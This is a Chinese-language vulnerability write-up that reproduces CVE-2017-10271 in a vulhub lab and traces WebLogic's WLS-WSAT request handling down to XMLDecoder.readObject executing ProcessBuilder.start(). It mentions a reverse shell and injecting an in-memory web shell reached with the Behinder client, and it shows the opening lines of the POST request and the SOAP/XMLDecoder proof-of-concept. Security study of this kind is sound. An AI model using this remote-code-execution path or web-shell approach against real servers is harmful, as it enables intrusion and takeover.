复现
[参考](weblogic漏洞分析之CVE-2017-10271 - 先知社区 (aliyun.com))
vulhub
一键部署
远程调试没问题
反弹shell
1 | POST /wls-wsat/CoordinatorPortType HTTP/1.1 |
这里是用工具写入内存马再去连接的,冰蝎4.0.1似乎连不上,因为秘钥是写在代码中的
这里注入内存马是单独设置的密码
还是使用的3.x版本去连接的
漏洞分析
本文的重点还是放在代码上
CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞
http://url:port/wls-wsat/CoordinatorPortType
post
发送数据包
再构造SOAP(XML)
格式的请求解析过程中触发XMLDecoder
反序列化漏洞
由于class体量太大
这里我就反编译了weblogic的jar
需者自取
提取码:9x8l
在wlserver_10.3\server\lib\weblogic.jar!\weblogic\wsee\jaxws\workcontext\WorkContextServerTube.class
的processRequest
方法
这里的var1
传入的是XML数据
经过修饰后变成var3
进入到readHeaderOld
方法
前面的获取了POST
数据包中XML
参数
后面通过ByteArrayInputStream
将XML数据变成字节数组输出流赋值给var4
这里如果调试成功的是可以看到var4
的格式就是poc
中的XML部分
1 | <java version="1.7.0_80" class="java.beans.XMLDecoder"> |
var4.toByteArray()
:将var4
的内容转为字节数组,然后传入ByteArrayInputStream
转化为流。WorkContextXmlInputAdapter
类,将接受道德输入流再转换成XMLDecoder
之后进入执行receive( )
函数。
跟进到WorkContextLocalMap
类下的receiveRequest
方法
其中调用了WorkContextEntryImpl
的readEntry
方法
最后到WorkContextXmlInputAdapter
下的readUTF
此处调用了xmlDecoder.readObject
最终执行了执行了XML数据中的ProcessBuilder.start()
poc
1 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> |